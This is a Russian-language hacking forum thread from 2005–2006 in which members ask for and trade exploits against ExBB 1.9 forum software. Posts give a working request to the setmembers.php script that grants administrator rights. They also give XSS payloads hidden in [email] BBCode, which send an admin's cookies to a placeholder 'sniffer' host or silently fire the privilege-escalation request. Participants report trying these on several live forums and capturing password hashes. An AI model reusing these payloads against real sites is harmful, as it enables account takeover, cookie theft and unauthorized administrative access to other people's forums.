Вопрос про уязвимости в ExBB 1.9

Discussion in 'Песочница' started by cardons, 30 Dec 2005.

  1. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Какие у него есть Xss ошибки?Или сплойты.Дайте пжл
     
  2. ZeroHour

    ZeroHour Member

    Joined:
    28 Aug 2005
    Messages:
    28
    Likes Received:
    5
    Reputations:
    3
    вот тебе линки на видео -
    раз
    два

    было еще, но щас уже его почуму-то нету=(
     
  3. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?
     
  4. slime

    slime New Member

    Joined:
    8 Dec 2005
    Messages:
    30
    Likes Received:
    1
    Reputations:
    -2
    хы, чувак, сам себя лолишь...
    почти ко всем видосам прилогается тхт файлик со всем что ты видел на экране в блокнотике ...
    ыыыыыыыыыыыыы
     
  5. cardons

    cardons Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    778
    Likes Received:
    324
    Reputations:
    83
    Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.
     
  6. slime

    slime New Member

    Joined:
    8 Dec 2005
    Messages:
    30
    Likes Received:
    1
    Reputations:
    -2
    а что ты тз того видео не наешь как сделать???
    как из админки сделать себя админом..... хы.... можно скачать себе этот форум и сгенерить этот урл...

    но если лень то пжалста...
    Code:
    setmembers.php?action=edit_user&checkaction=yes&userid=[Пишем сюда ID юзера]&membertitle=&[email protected]&newname=[тут должно быть новое имя]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC
    
    на сколько я помню те КСС-ы у мя не работали чего-то вот ксс который работает
    Code:
    email]'style='display:none;background:url(javascript:document.images[2].src="[сниффер]?"+document.cookie)[/email]
    
    подправь ксс а то тут его подпортить немнного пришлось чтобы видно было... ну суть думаю понятна
     
  7. dante

    dante New Member

    Joined:
    28 Jan 2006
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?
     
  8. slime

    slime New Member

    Joined:
    8 Dec 2005
    Messages:
    30
    Likes Received:
    1
    Reputations:
    -2
    ну типа надо подождать немножко, пока админ просмотрит сообщение... или если у админа картинки отключены ничего не получится... ну или у админа броузер ОПЕРА... для оперы надо немного переделать КСС...
    Code:
    [*email]'style=background:url("javascript:document.images[0].src='setmembers.php?action=edit_user&checkaction=yes&userid=[ID]&membertitle=&[email protected]&newname=[ИМЯ]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC'");[/*email]
    
    Вот это проверил -- работает... только свой ID поставь и ИМЯ. и про репу желательно помнить :))
     
  9. dante

    dante New Member

    Joined:
    28 Jan 2006
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    slime, репу я те плюснул, но что-то непохоже чтоб твоя ксс-ка меня админом сделала... последняя вообще отображается, добавил display:none - перестала, но я эту урлу тестил на нескольких форумах, и что-то пока не админ.. в чем может быть дело, есть какие-то идейки? Может знаешь, где копать? Буду весьма признателен
     
  10. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Парни, извините что в не тему, но вот сейчас проводил xss на ExBB 1.9.1 Снифер прошел хорошо, но дело в том, что хешь интересный, допустим пасс стоит 123456
    хешь от него e10adc3949ba59abbe56e057f20f883e а приходит d41d8cd98f00b204e9800998ecf8427e , бред какойто, может кто подскажет, иль стукните в асю.
    Я обычно в инвизбл сижу.
     
  11. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Парни, спасибо, можно не отвечать на вопрос, разобрался, это типа милкивей в 3-е вкусней, оказывается там соль+мд5 зашифровался еще раз в мд5(
     
Loading...